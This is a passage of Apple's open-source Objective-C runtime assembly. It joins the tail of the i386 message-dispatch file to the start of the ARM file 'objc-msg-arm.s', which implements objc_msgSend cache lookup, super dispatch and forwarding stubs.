.cfi_def_cfa_offset 8
.cfi_offset ebp, -8
movl %esp, %ebp
.cfi_def_cfa_register ebp
subl $$(8+5*16), %esp
movdqa %xmm3, 4*16(%esp)
movdqa %xmm2, 3*16(%esp)
movdqa %xmm1, 2*16(%esp)
movdqa %xmm0, 1*16(%esp)
movl %edx, 8(%esp) // class
movl %ecx, 4(%esp) // selector
movl %eax, 0(%esp) // receiver
call __class_lookupMethodAndLoadCache3
// imp in eax
movdqa 4*16(%esp), %xmm3
movdqa 3*16(%esp), %xmm2
movdqa 2*16(%esp), %xmm1
movdqa 1*16(%esp), %xmm0
leave
.cfi_def_cfa esp, 4
.cfi_same_value ebp
.if $0 == SUPER
// replace "super" arg with "receiver"
movl super(%esp), %ecx // get super structure
movl receiver(%ecx), %ecx // get messaged object
movl %ecx, super(%esp) // make it the first argument
.elseif $0 == SUPER_STRET
// replace "super" arg with "receiver"
movl super_stret(%esp), %ecx // get super structure
movl receiver(%ecx), %ecx // get messaged object
movl %ecx, super_stret(%esp) // make it the first argument
.endif
.if $0 == STRET || $0 == SUPER_STRET
// set ne (stret) for forwarding; eax != 0
test %eax, %eax
jmp *%eax // call imp
.else
// set eq (non-stret) for forwarding
cmp %eax, %eax
jmp *%eax // call imp
.endif
.endmacro
/////////////////////////////////////////////////////////////////////
//
// NilTest return-type
//
// Takes: $0 = NORMAL or FPRET or STRET
// eax = receiver
//
// On exit: Loads non-nil receiver in eax and self(esp) or self_stret(esp),
// or returns zero.
//
// NilTestSupport return-type
//
// Takes: $0 = NORMAL or FPRET or STRET
// eax = receiver
//
// On exit: Loads non-nil receiver in eax and self(esp) or self_stret(esp),
// or returns zero.
//
/////////////////////////////////////////////////////////////////////
.macro NilTest
testl %eax, %eax
jz LNilTestSlow_f
LNilTestDone:
.endmacro
.macro NilTestSupport
.align 3
LNilTestSlow:
.if $0 == FPRET
fldz
MESSENGER_END_NIL
ret
.elseif $0 == STRET
MESSENGER_END_NIL
ret $$4
.elseif $0 == NORMAL
// eax is already zero
xorl %edx, %edx
xorps %xmm0, %xmm0
xorps %xmm1, %xmm1
MESSENGER_END_NIL
ret
.endif
.endmacro
/********************************************************************
 * IMP _cache_getImp(Class cls, SEL sel)
 *
 * If found, returns method implementation.
 * If not found, returns NULL.
 * (Cache-only probe: never falls through to the method lists.)
 ********************************************************************/

	STATIC_ENTRY _cache_getImp

// load the class and selector
	movl	selector(%esp), %ecx
	movl	self(%esp), %edx	// "self" slot holds the Class argument

	CacheLookup GETIMP		// returns IMP on success

LCacheMiss:
	// cache miss, return nil
	xorl	%eax, %eax
	ret

LGetImpExit:
	END_ENTRY _cache_getImp
/********************************************************************
 *
 * id objc_msgSend(id self, SEL _cmd,...);
 *
 * Standard messenger: nil-check, cache probe, then fall back to the
 * method-table lookup on a miss.
 *
 ********************************************************************/

	ENTRY	_objc_msgSend
	MESSENGER_START

	movl	selector(%esp), %ecx
	movl	self(%esp), %eax

	NilTest	NORMAL

	movl	isa(%eax), %edx		// class = self->isa
	CacheLookup NORMAL		// calls IMP on success

	NilTestSupport	NORMAL

LCacheMiss:
	// isa still in edx
	movl	selector(%esp), %ecx
	movl	self(%esp), %eax
	MethodTableLookup NORMAL	// calls IMP

LMsgSendExit:
	END_ENTRY	_objc_msgSend
/********************************************************************
 *
 * id objc_msgSendSuper(struct objc_super *super, SEL _cmd,...);
 *
 * struct objc_super {
 *	id	receiver;
 *	Class	class;
 * };
 *
 * Searches starting at super->class. The CacheHit/MethodTableLookup
 * SUPER variants rewrite the first argument from the objc_super* to
 * the actual receiver before calling the IMP.
 ********************************************************************/

	ENTRY	_objc_msgSendSuper
	MESSENGER_START

	movl	selector(%esp), %ecx
	movl	super(%esp), %eax	// struct objc_super
	movl	class(%eax), %edx	// struct objc_super->class
	CacheLookup SUPER		// calls IMP on success

LCacheMiss:
	// class still in edx
	movl	selector(%esp), %ecx
	movl	super(%esp), %eax
	movl	receiver(%eax), %eax
	MethodTableLookup SUPER		// calls IMP

LMsgSendSuperExit:
	END_ENTRY	_objc_msgSendSuper

	// objc_msgSendSuper2: like objc_msgSendSuper, but objc_super.class
	// is the current class, so the search starts at its superclass.
	ENTRY	_objc_msgSendSuper2
	MESSENGER_START

	movl	selector(%esp), %ecx
	movl	super(%esp), %eax	// struct objc_super
	movl	class(%eax), %eax	// struct objc_super->class
	mov	superclass(%eax), %edx	// edx = objc_super->class->super_class
	CacheLookup SUPER		// calls IMP on success

LCacheMiss:
	// class still in edx
	movl	selector(%esp), %ecx
	movl	super(%esp), %eax
	movl	receiver(%eax), %eax
	MethodTableLookup SUPER		// calls IMP

LMsgSendSuper2Exit:
	END_ENTRY	_objc_msgSendSuper2
/********************************************************************
 *
 * double objc_msgSend_fpret(id self, SEL _cmd,...);
 *
 * FP-return messenger; differs from objc_msgSend only in the value a
 * nil receiver returns (0.0 on the x87 stack, via NilTestSupport FPRET).
 *
 ********************************************************************/

	ENTRY	_objc_msgSend_fpret
	MESSENGER_START

	movl	selector(%esp), %ecx
	movl	self(%esp), %eax

	NilTest	FPRET

	movl	isa(%eax), %edx		// class = self->isa
	CacheLookup FPRET		// calls IMP on success

	NilTestSupport	FPRET

LCacheMiss:
	// class still in edx
	movl	selector(%esp), %ecx
	movl	self(%esp), %eax
	MethodTableLookup FPRET		// calls IMP

LMsgSendFpretExit:
	END_ENTRY	_objc_msgSend_fpret

/********************************************************************
 *
 * void	objc_msgSend_stret(void *st_addr, id self, SEL _cmd, ...);
 *
 *
 * objc_msgSend_stret is the struct-return form of msgSend.
 * The ABI calls for (sp+4) to be used as the address of the structure
 * being returned, with the parameters in the succeeding locations.
 *
 * On entry:	(sp+4) is the address where the structure is returned,
 *		(sp+8) is the message receiver,
 *		(sp+12) is the selector
 ********************************************************************/

	ENTRY	_objc_msgSend_stret
	MESSENGER_START

	movl	selector_stret(%esp), %ecx
	movl	self_stret(%esp), %eax

	NilTest	STRET

	movl	isa(%eax), %edx		// class = self->isa
	CacheLookup STRET		// calls IMP on success

	NilTestSupport	STRET

LCacheMiss:
	// class still in edx
	movl	selector_stret(%esp), %ecx
	movl	self_stret(%esp), %eax
	MethodTableLookup STRET		// calls IMP

LMsgSendStretExit:
	END_ENTRY	_objc_msgSend_stret
/********************************************************************
 *
 * void objc_msgSendSuper_stret(void *st_addr, struct objc_super *super, SEL _cmd, ...);
 *
 * struct objc_super {
 *	id	receiver;
 *	Class	class;
 * };
 *
 * objc_msgSendSuper_stret is the struct-return form of msgSendSuper.
 * The ABI calls for (sp+4) to be used as the address of the structure
 * being returned, with the parameters in the succeeding registers.
 *
 * On entry:	(sp+4) is the address where the structure is returned,
 *		(sp+8) is the address of the objc_super structure,
 *		(sp+12) is the selector
 *
 ********************************************************************/

	ENTRY	_objc_msgSendSuper_stret
	MESSENGER_START

	movl	selector_stret(%esp), %ecx
	movl	super_stret(%esp), %eax	// struct objc_super
	movl	class(%eax), %edx	// struct objc_super->class
	CacheLookup SUPER_STRET		// calls IMP on success

LCacheMiss:
	// class still in edx
	movl	selector_stret(%esp), %ecx
	movl	super_stret(%esp), %eax
	movl	receiver(%eax), %eax
	MethodTableLookup SUPER_STRET	// calls IMP

LMsgSendSuperStretExit:
	END_ENTRY	_objc_msgSendSuper_stret

	// Super2 variant: objc_super.class is the current class, so the
	// search starts at its superclass.
	ENTRY	_objc_msgSendSuper2_stret
	MESSENGER_START

	movl	selector_stret(%esp), %ecx
	movl	super_stret(%esp), %eax	// struct objc_super
	movl	class(%eax), %eax	// struct objc_super->class
	mov	superclass(%eax), %edx	// edx = objc_super->class->super_class
	CacheLookup SUPER_STRET		// calls IMP on success

// cache miss: go search the method lists
LCacheMiss:
	// class still in edx
	movl	selector_stret(%esp), %ecx
	movl	super_stret(%esp), %eax
	movl	receiver(%eax), %eax
	MethodTableLookup SUPER_STRET	// calls IMP

LMsgSendSuper2StretExit:
	END_ENTRY	_objc_msgSendSuper2_stret
/********************************************************************
 *
 * _objc_msgSend_uncached_impcache
 * _objc_msgSend_uncached
 * _objc_msgSend_stret_uncached
 *
 * Used to erase method cache entries in-place by
 * bouncing them to the uncached lookup.
 *
 ********************************************************************/

	STATIC_ENTRY __objc_msgSend_uncached_impcache
	// Method cache version

	// THIS IS NOT A CALLABLE C FUNCTION
	// Out-of-band condition register is NE for stret, EQ otherwise.
	// Out-of-band edx is the searched class

	MESSENGER_START
	nop
	MESSENGER_END_SLOW

	// Dispatch on the stret flag left in the condition codes by CacheHit
	jne	__objc_msgSend_stret_uncached
	jmp	__objc_msgSend_uncached

	END_ENTRY __objc_msgSend_uncached_impcache

	STATIC_ENTRY __objc_msgSend_uncached

	// THIS IS NOT A CALLABLE C FUNCTION
	// Out-of-band edx is the searched class

	// edx is already the class to search
	movl	selector(%esp), %ecx
	MethodTableLookup NORMAL	// calls IMP

	END_ENTRY __objc_msgSend_uncached

	STATIC_ENTRY __objc_msgSend_stret_uncached
	// THIS IS NOT A CALLABLE C FUNCTION
	// Out-of-band edx is the searched class

	// edx is already the class to search
	movl	selector_stret(%esp), %ecx
	MethodTableLookup STRET		// calls IMP

	END_ENTRY __objc_msgSend_stret_uncached
/********************************************************************
 *
 * id _objc_msgForward(id self, SEL _cmd,...);
 *
 * _objc_msgForward and _objc_msgForward_stret are the externally-callable
 * functions returned by things like method_getImplementation().
 * _objc_msgForward_impcache is the function pointer actually stored in
 * method caches.
 *
 ********************************************************************/

// Indirect pointers to the forwarding handler function pointers,
// dereferenced (twice) by __objc_msgForward / __objc_msgForward_stret.
.non_lazy_symbol_pointer
L_forward_handler:
	.indirect_symbol __objc_forward_handler
	.long 0
L_forward_stret_handler:
	.indirect_symbol __objc_forward_stret_handler
	.long 0
STATIC_ENTRY __objc_msgForward_impcache
// Method cache version
// THIS IS NOT A CALLABLE C FUNCTION
// Out-of-band condition register is NE for stret, EQ otherwise.
MESSENGER_START
nop
MESSENGER_END_SLOW
jne __objc_msgForward_stret
jmp __objc_msgForward
END_ENTRY _objc_msgForward_impcache
	ENTRY	__objc_msgForward
	// Non-struct return version

	// PIC trick: call/pop to get the address of label 1 into edx,
	// then tail-call through the handler's indirect pointer.
	call	1f
1:	popl	%edx
	movl	L_forward_handler-1b(%edx), %edx
	jmp	*(%edx)

	END_ENTRY	__objc_msgForward

	ENTRY	__objc_msgForward_stret
	// Struct return version

	// Same PIC trick, via the stret handler pointer.
	call	1f
1:	popl	%edx
	movl	L_forward_stret_handler-1b(%edx), %edx
	jmp	*(%edx)

	END_ENTRY	__objc_msgForward_stret
	// _debug entry points are plain aliases that tail into the real
	// messengers; _noarg likewise aliases objc_msgSend.
	ENTRY _objc_msgSend_debug
	jmp	_objc_msgSend
	END_ENTRY _objc_msgSend_debug

	ENTRY _objc_msgSendSuper2_debug
	jmp	_objc_msgSendSuper2
	END_ENTRY _objc_msgSendSuper2_debug

	ENTRY _objc_msgSend_stret_debug
	jmp	_objc_msgSend_stret
	END_ENTRY _objc_msgSend_stret_debug

	ENTRY _objc_msgSendSuper2_stret_debug
	jmp	_objc_msgSendSuper2_stret
	END_ENTRY _objc_msgSendSuper2_stret_debug

	ENTRY _objc_msgSend_fpret_debug
	jmp	_objc_msgSend_fpret
	END_ENTRY _objc_msgSend_fpret_debug

	ENTRY _objc_msgSend_noarg
	jmp	_objc_msgSend
	END_ENTRY _objc_msgSend_noarg

	ENTRY _method_invoke
	// IMP-style entry for a Method struct: the "selector" slot actually
	// holds a Method*; replace it with the method's real SEL and jump
	// to the method's implementation.

	movl	selector(%esp), %ecx		// ecx = Method
	movl	method_name(%ecx), %edx		// edx = method->name (SEL)
	movl	method_imp(%ecx), %eax		// eax = method->imp
	movl	%edx, selector(%esp)		// substitute the real SEL
	jmp	*%eax

	END_ENTRY _method_invoke

	ENTRY _method_invoke_stret
	// Struct-return form of method_invoke.

	movl	selector_stret(%esp), %ecx	// ecx = Method
	movl	method_name(%ecx), %edx		// edx = method->name (SEL)
	movl	method_imp(%ecx), %eax		// eax = method->imp
	movl	%edx, selector_stret(%esp)	// substitute the real SEL
	jmp	*%eax

	END_ENTRY _method_invoke_stret
#if DEBUG
	// IMP for ignored selectors: returns self unchanged.
	STATIC_ENTRY __objc_ignored_method

	movl	self(%esp), %eax
	ret

	END_ENTRY __objc_ignored_method
#endif
.section __DATA,__objc_msg_break
.long 0
.long 0
#endif
|
opensource-apple/objc4 | 19,597 | runtime/Messengers.subproj/objc-msg-arm.s | /*
* @APPLE_LICENSE_HEADER_START@
*
* Copyright (c) 1999-2007 Apple Computer, Inc. All Rights Reserved.
*
* This file contains Original Code and/or Modifications of Original Code
* as defined in and that are subject to the Apple Public Source License
* Version 2.0 (the 'License'). You may not use this file except in
* compliance with the License. Please obtain a copy of the License at
* http://www.opensource.apple.com/apsl/ and read it before using this
* file.
*
* The Original Code and all software distributed under the License are
* distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
* EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
* INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
* Please see the License for the specific language governing rights and
* limitations under the License.
*
* @APPLE_LICENSE_HEADER_END@
*/
/********************************************************************
*
* objc-msg-arm.s - ARM code to support objc messaging
*
********************************************************************/
#ifdef __arm__

#include <arm/arch.h>

#ifndef _ARM_ARCH_7
#   error requires armv7
#endif

// Set FP=1 on architectures that pass parameters in floating-point registers
// (armv7k / AAPCS-VFP); elsewhere the FP_* helpers below are no-ops.
#if __ARM_ARCH_7K__
#   define FP 1
#else
#   define FP 0
#endif

#if FP

#   if !__ARM_NEON__
#       error sorry
#   endif

    // FP_RETURN_ZERO: zero the FP return/argument registers q0-q3
    // (used when messaging nil). FP_SAVE/FP_RESTORE preserve the FP
    // argument registers across a C call.
#   define FP_RETURN_ZERO \
	vmov.i32  q0, #0        ; \
	vmov.i32  q1, #0        ; \
	vmov.i32  q2, #0        ; \
	vmov.i32  q3, #0

#   define FP_SAVE \
	vpush	{q0-q3}

#   define FP_RESTORE \
	vpop	{q0-q3}

#else

#   define FP_RETURN_ZERO
#   define FP_SAVE
#   define FP_RESTORE

#endif
.syntax unified

// Emit a non-lazy (indirect) pointer for an external symbol.
#define MI_EXTERN(var) \
	.non_lazy_symbol_pointer                        ;\
L ## var ## $$non_lazy_ptr:                             ;\
	.indirect_symbol var                            ;\
	.long 0

// Load an external symbol's value through its non-lazy pointer,
// PC-relative (PC reads as '.'+8 in ARM mode, hence the -4f-4).
#define MI_GET_EXTERN(reg,var) \
	movw	reg, :lower16:(L##var##$$non_lazy_ptr-4f-4)  ;\
	movt	reg, :upper16:(L##var##$$non_lazy_ptr-4f-4)  ;\
4:	add	reg, pc                                      ;\
	ldr	reg, [reg]

#define MI_CALL_EXTERNAL(var) \
	MI_GET_EXTERN(r12,var)  ;\
	blx	r12

// Compute the address of a local symbol, PC-relative.
// NOTE: the macro must end here — the previous version carried a
// trailing ';\' continuation that pulled the MI_EXTERN line below into
// the macro body, re-emitting the non-lazy pointer (duplicate label,
// wrong section) at every expansion.
#define MI_GET_ADDRESS(reg,var) \
	movw	reg, :lower16:(var-4f-4)  ;\
	movt	reg, :upper16:(var-4f-4)  ;\
4:	add	reg, pc

MI_EXTERN(__class_lookupMethodAndLoadCache3)
MI_EXTERN(___objc_error)
.data

// _objc_entryPoints and _objc_exitPoints are used by method dispatch
// caching code to figure out whether any threads are actively
// in the cache for dispatching.  The labels surround the asm code
// that do cache lookups.  The tables are zero-terminated.

.align 2
.private_extern _objc_entryPoints
_objc_entryPoints:
	.long   _cache_getImp
	.long   _objc_msgSend
	.long   _objc_msgSend_stret
	.long   _objc_msgSendSuper
	.long   _objc_msgSendSuper_stret
	.long   _objc_msgSendSuper2
	.long   _objc_msgSendSuper2_stret
	.long   0

.private_extern _objc_exitPoints
_objc_exitPoints:
	.long   LGetImpExit
	.long   LMsgSendExit
	.long   LMsgSendStretExit
	.long   LMsgSendSuperExit
	.long   LMsgSendSuperStretExit
	.long   LMsgSendSuper2Exit
	.long   LMsgSendSuper2StretExit
	.long   0
/********************************************************************
* List every exit insn from every messenger for debugger use.
* Format:
* (
* 1 word instruction's address
* 1 word type (ENTER or FAST_EXIT or SLOW_EXIT or NIL_EXIT)
* )
* 1 word zero
*
* ENTER is the start of a dispatcher
* FAST_EXIT is method dispatch
* SLOW_EXIT is uncached method lookup
* NIL_EXIT is returning zero from a message sent to nil
* These must match objc-gdb.h.
********************************************************************/
#define ENTER 1
#define FAST_EXIT 2
#define SLOW_EXIT 3
#define NIL_EXIT 4
.section __DATA,__objc_msg_break
.globl _gdb_objc_messenger_breakpoints
_gdb_objc_messenger_breakpoints:
// contents populated by the macros below
// Each MESSENGER_* macro drops local label 4: at the current .text position,
// then records the pair (address, type) in __DATA,__objc_msg_break and
// switches back to .text. They emit no instructions of their own.
.macro MESSENGER_START
4:
.section __DATA,__objc_msg_break
.long 4b
.long ENTER
.text
.endmacro
.macro MESSENGER_END_FAST
4:
.section __DATA,__objc_msg_break
.long 4b
.long FAST_EXIT
.text
.endmacro
.macro MESSENGER_END_SLOW
4:
.section __DATA,__objc_msg_break
.long 4b
.long SLOW_EXIT
.text
.endmacro
.macro MESSENGER_END_NIL
4:
.section __DATA,__objc_msg_break
.long 4b
.long NIL_EXIT
.text
.endmacro
/********************************************************************
* Names for relative labels
* DO NOT USE THESE LABELS ELSEWHERE
* Reserved labels: 8: 9:
********************************************************************/
// These expand to assembler numeric local labels, so e.g. "LCacheMiss:"
// in a messenger body becomes "8:" and LCacheMiss_f / LCacheMiss_b are
// the forward/backward references to it.
#define LCacheMiss 8
#define LCacheMiss_f 8f
#define LCacheMiss_b 8b
#define LNilReceiver 9
#define LNilReceiver_f 9f
#define LNilReceiver_b 9b
/********************************************************************
* Macro parameters
********************************************************************/
// Dispatch flavor selectors passed to CacheLookup / CacheHit.
#define NORMAL 0
#define FPRET 1
#define FP2RET 2
#define GETIMP 3
#define STRET 4
#define SUPER 5
#define SUPER2 6
#define SUPER_STRET 7
#define SUPER2_STRET 8
/********************************************************************
*
* Structure definitions.
*
********************************************************************/
/* objc_super parameter to sendSuper */
// 4-byte pointer fields (32-bit ARM).
#define RECEIVER 0
#define CLASS 4
/* Selected field offsets in class structure */
#define ISA 0
#define SUPERCLASS 4
#define CACHE 8
#define CACHE_MASK 12
/* Selected field offsets in method structure */
#define METHOD_NAME 0
#define METHOD_TYPES 4
#define METHOD_IMP 8
//////////////////////////////////////////////////////////////////////
//
// ENTRY functionName
//
// Assembly directives to begin an exported function.
//
// Takes: functionName - name of the exported function
//////////////////////////////////////////////////////////////////////
.macro ENTRY /* name */
.text
.thumb
// .align 5: 32-byte align each messenger entry point.
.align 5
.globl _$0
// .thumb_func marks _$0 as Thumb so interworking branches are correct.
.thumb_func
_$0:
.endmacro
// Same as ENTRY but the symbol is not exported from the image.
.macro STATIC_ENTRY /*name*/
.text
.thumb
.align 5
.private_extern _$0
.thumb_func
_$0:
.endmacro
//////////////////////////////////////////////////////////////////////
//
// END_ENTRY functionName
//
// Assembly directives to end an exported function. Just a placeholder,
// a close-parenthesis for ENTRY, until it is needed for something.
//
// Takes: functionName - name of the exported function
//////////////////////////////////////////////////////////////////////
.macro END_ENTRY /* name */
.endmacro
/////////////////////////////////////////////////////////////////////
//
// CacheLookup return-type
//
// Locate the implementation for a selector in a class's method cache.
//
// Takes:
// $0 = NORMAL, STRET, SUPER, SUPER_STRET, SUPER2, SUPER2_STRET, GETIMP
// r0 or r1 (STRET) = receiver
// r1 or r2 (STRET) = selector
// r9 = class to search in
//
// On exit: r9 and r12 clobbered
// (found) calls or returns IMP, eq/ne/r9 set for forwarding
// (not found) jumps to LCacheMiss
//
/////////////////////////////////////////////////////////////////////
// CacheHit $0: entered with r9 = the matching cache bucket. Buckets are
// 8 bytes, { SEL sel; IMP imp; }, so bucket->imp is at [r9, #4]. Each
// flavor also establishes the out-of-band Z/r9 convention consumed by
// _objc_msgSend_uncached_impcache / _objc_msgForward_impcache.
.macro CacheHit
.if $0 == GETIMP
ldr r0, [r9, #4] // r0 = bucket->imp
MI_GET_ADDRESS(r1, __objc_msgSend_uncached_impcache)
teq r0, r1
it eq
moveq r0, #0 // don't return msgSend_uncached
bx lr // return imp
.elseif $0 == NORMAL
ldr r12, [r9, #4] // r12 = bucket->imp
// eq already set for nonstret forward
MESSENGER_END_FAST
bx r12 // call imp
.elseif $0 == STRET
ldr r12, [r9, #4] // r12 = bucket->imp
movs r9, #1 // r9=1, Z=0 for stret forwarding
MESSENGER_END_FAST
bx r12 // call imp
.elseif $0 == SUPER
ldr r12, [r9, #4] // r12 = bucket->imp
ldr r9, [r0, #CLASS] // r9 = class to search for forwarding
ldr r0, [r0, #RECEIVER] // fetch real receiver
tst r12, r12 // set ne for forwarding (r12!=0)
MESSENGER_END_FAST
bx r12 // call imp
.elseif $0 == SUPER2
ldr r12, [r9, #4] // r12 = bucket->imp
ldr r9, [r0, #CLASS]
ldr r9, [r9, #SUPERCLASS] // r9 = class to search for forwarding
ldr r0, [r0, #RECEIVER] // fetch real receiver
tst r12, r12 // set ne for forwarding (r12!=0)
MESSENGER_END_FAST
bx r12 // call imp
.elseif $0 == SUPER_STRET
ldr r12, [r9, #4] // r12 = bucket->imp
ldr r9, [r1, #CLASS] // r9 = class to search for forwarding
orr r9, r9, #1 // r9 = class|1 for super_stret forward
ldr r1, [r1, #RECEIVER] // fetch real receiver
tst r12, r12 // set ne for forwarding (r12!=0)
MESSENGER_END_FAST
bx r12 // call imp
.elseif $0 == SUPER2_STRET
ldr r12, [r9, #4] // r12 = bucket->imp
ldr r9, [r1, #CLASS] // r9 = class to search for forwarding
ldr r9, [r9, #SUPERCLASS] // r9 = class to search for forwarding
orr r9, r9, #1 // r9 = class|1 for super_stret forward
ldr r1, [r1, #RECEIVER] // fetch real receiver
tst r12, r12 // set ne for forwarding (r12!=0)
MESSENGER_END_FAST
bx r12 // call imp
.else
.abort oops
.endif
.endmacro
// CacheLookup $0: scan the class's method cache (see banner above).
// On entry r9 = class; SEL is in r1 (r2 for stret flavors). On a hit it
// expands CacheHit; on a miss it branches to the caller's LCacheMiss label.
.macro CacheLookup
// cache->mask is a 16-bit halfword at class+CACHE_MASK.
ldrh r12, [r9, #CACHE_MASK] // r12 = mask
ldr r9, [r9, #CACHE] // r9 = buckets
.if $0 == STRET || $0 == SUPER_STRET
and r12, r12, r2 // r12 = index = SEL & mask
.else
and r12, r12, r1 // r12 = index = SEL & mask
.endif
// Buckets are 8 bytes each ({sel, imp}), hence index*8.
add r9, r9, r12, LSL #3 // r9 = bucket = buckets+index*8
ldr r12, [r9] // r12 = bucket->sel
2:
.if $0 == STRET || $0 == SUPER_STRET
teq r12, r2
.else
teq r12, r1
.endif
bne 1f
CacheHit $0
1:
// sel==0 means empty bucket (miss); sel==1 is the wrap sentinel.
cmp r12, #1
blo LCacheMiss_f // if (bucket->sel == 0) cache miss
it eq // if (bucket->sel == 1) cache wrap
ldreq r9, [r9, #4] // bucket->imp is before first bucket
ldr r12, [r9, #8]! // r12 = (++bucket)->sel
b 2b
.endmacro
/********************************************************************
* IMP cache_getImp(Class cls, SEL sel)
*
* On entry: r0 = class whose cache is to be searched
* r1 = selector to search for
*
* If found, returns method implementation.
* If not found, returns NULL.
********************************************************************/
STATIC_ENTRY cache_getImp
mov r9, r0 // CacheLookup expects the class in r9
CacheLookup GETIMP // returns IMP on success
// LCacheMiss expands to local label 8: (see defines above).
LCacheMiss:
mov r0, #0 // return nil if cache miss
bx lr
LGetImpExit:
END_ENTRY cache_getImp
/********************************************************************
*
* id objc_msgSend(id self, SEL _cmd,...);
*
********************************************************************/
ENTRY objc_msgSend
MESSENGER_START
cbz r0, LNilReceiver_f // nil receiver: short-circuit to zero return
ldr r9, [r0] // r9 = self->isa
CacheLookup NORMAL
// calls IMP or LCacheMiss
LCacheMiss:
MESSENGER_END_SLOW
ldr r9, [r0, #ISA] // class = receiver->isa
b __objc_msgSend_uncached
LNilReceiver:
// Message to nil: return zero in all integer (and, on hard-float
// targets, floating-point) return registers.
// r0 is already zero
mov r1, #0
mov r2, #0
mov r3, #0
FP_RETURN_ZERO
MESSENGER_END_NIL
bx lr
LMsgSendExit:
END_ENTRY objc_msgSend
/********************************************************************
* id objc_msgSend_noarg(id self, SEL op)
*
* On entry: r0 is the message receiver,
* r1 is the selector
********************************************************************/
// Identical register layout to objc_msgSend; simply tail-branches there.
ENTRY objc_msgSend_noarg
b _objc_msgSend
END_ENTRY objc_msgSend_noarg
/********************************************************************
* void objc_msgSend_stret(void *st_addr, id self, SEL op, ...);
*
* objc_msgSend_stret is the struct-return form of msgSend.
* The ABI calls for r0 to be used as the address of the structure
* being returned, with the parameters in the succeeding registers.
*
* On entry: r0 is the address where the structure is returned,
* r1 is the message receiver,
* r2 is the selector
********************************************************************/
ENTRY objc_msgSend_stret
MESSENGER_START
cbz r1, LNilReceiver_f // receiver is r1 here (r0 = struct address)
ldr r9, [r1] // r9 = self->isa
CacheLookup STRET
// calls IMP or LCacheMiss
LCacheMiss:
MESSENGER_END_SLOW
ldr r9, [r1] // r9 = self->isa
b __objc_msgSend_stret_uncached
LNilReceiver:
// Message to nil: return without touching the caller's struct buffer.
MESSENGER_END_NIL
bx lr
LMsgSendStretExit:
END_ENTRY objc_msgSend_stret
/********************************************************************
* id objc_msgSendSuper(struct objc_super *super, SEL op, ...)
*
* struct objc_super {
* id receiver;
* Class cls; // the class to search
* }
********************************************************************/
// Note: no nil-receiver check in super dispatch (the objc_super struct
// pointer in r0 is assumed valid; cf. the NilTest comment in the x86_64
// messenger, "super dispatch does not test for nil").
ENTRY objc_msgSendSuper
MESSENGER_START
ldr r9, [r0, #CLASS] // r9 = struct super->class
CacheLookup SUPER
// calls IMP or LCacheMiss
LCacheMiss:
MESSENGER_END_SLOW
ldr r9, [r0, #CLASS] // r9 = struct super->class
ldr r0, [r0, #RECEIVER] // load real receiver
b __objc_msgSend_uncached
LMsgSendSuperExit:
END_ENTRY objc_msgSendSuper
/********************************************************************
* id objc_msgSendSuper2(struct objc_super *super, SEL op, ...)
*
* struct objc_super {
* id receiver;
* Class cls; // SUBCLASS of the class to search
* }
********************************************************************/
// Same as objc_msgSendSuper, except the search starts one level up:
// at super->class->superclass.
ENTRY objc_msgSendSuper2
MESSENGER_START
ldr r9, [r0, #CLASS] // class = struct super->class
ldr r9, [r9, #SUPERCLASS] // class = class->superclass
CacheLookup SUPER2
// calls IMP or LCacheMiss
LCacheMiss:
MESSENGER_END_SLOW
ldr r9, [r0, #CLASS] // class = struct super->class
ldr r9, [r9, #SUPERCLASS] // class = class->superclass
ldr r0, [r0, #RECEIVER] // load real receiver
b __objc_msgSend_uncached
LMsgSendSuper2Exit:
END_ENTRY objc_msgSendSuper2
/********************************************************************
* void objc_msgSendSuper_stret(void *st_addr, objc_super *self, SEL op, ...);
*
* objc_msgSendSuper_stret is the struct-return form of msgSendSuper.
* The ABI calls for r0 to be used as the address of the structure
* being returned, with the parameters in the succeeding registers.
*
* On entry: r0 is the address where the structure is returned,
* r1 is the address of the objc_super structure,
* r2 is the selector
********************************************************************/
ENTRY objc_msgSendSuper_stret
MESSENGER_START
ldr r9, [r1, #CLASS] // r9 = struct super->class
CacheLookup SUPER_STRET
// calls IMP or LCacheMiss
LCacheMiss:
MESSENGER_END_SLOW
ldr r9, [r1, #CLASS] // r9 = struct super->class
ldr r1, [r1, #RECEIVER] // load real receiver
b __objc_msgSend_stret_uncached
LMsgSendSuperStretExit:
END_ENTRY objc_msgSendSuper_stret
/********************************************************************
* id objc_msgSendSuper2_stret
********************************************************************/
// Struct-return form of objc_msgSendSuper2: search starts at
// super->class->superclass; objc_super pointer is in r1 (r0 = struct addr).
ENTRY objc_msgSendSuper2_stret
MESSENGER_START
ldr r9, [r1, #CLASS] // class = struct super->class
ldr r9, [r9, #SUPERCLASS] // class = class->superclass
CacheLookup SUPER2_STRET
// calls IMP or LCacheMiss
LCacheMiss:
MESSENGER_END_SLOW
ldr r9, [r1, #CLASS] // class = struct super->class
ldr r9, [r9, #SUPERCLASS] // class = class->superclass
ldr r1, [r1, #RECEIVER] // load real receiver
b __objc_msgSend_stret_uncached
LMsgSendSuper2StretExit:
END_ENTRY objc_msgSendSuper2_stret
/********************************************************************
*
* _objc_msgSend_uncached_impcache
* Used to erase method cache entries in-place by
* bouncing them to the uncached lookup.
*
* _objc_msgSend_uncached
* _objc_msgSend_stret_uncached
* The uncached lookup.
*
********************************************************************/
STATIC_ENTRY _objc_msgSend_uncached_impcache
// Method cache version
// THIS IS NOT A CALLABLE C FUNCTION
// Out-of-band Z is 0 (EQ) for normal, 1 (NE) for stret and/or super
// Out-of-band r9 is 1 for stret, cls for super, cls|1 for super_stret
// Note objc_msgForward_impcache uses the same parameters
MESSENGER_START
nop
MESSENGER_END_SLOW
// Decode the out-of-band flavor:
// EQ (normal): load isa from self (r0) and take the non-stret path.
// NE + r9 bit0 clear (super): r9 already holds the class; non-stret path.
// NE + r9 bit0 set: stret or super_stret; handled below.
ite eq
ldreq r9, [r0] // normal: r9 = class = self->isa
tstne r9, #1 // low bit clear?
beq __objc_msgSend_uncached // super: r9 is already the class
// stret or super_stret
// eors leaves Z=1 only when r9 was exactly 1 (plain stret).
eors r9, r9, #1 // clear low bit
it eq // r9 now zero?
ldreq r9, [r1] // stret: r9 = class = self->isa
// super_stret: r9 is already the class
b __objc_msgSend_stret_uncached
END_ENTRY _objc_msgSend_uncached_impcache
// Slow path: look the method up in the class's method lists (and load the
// cache) via the C routine, then tail-call the resulting IMP with the
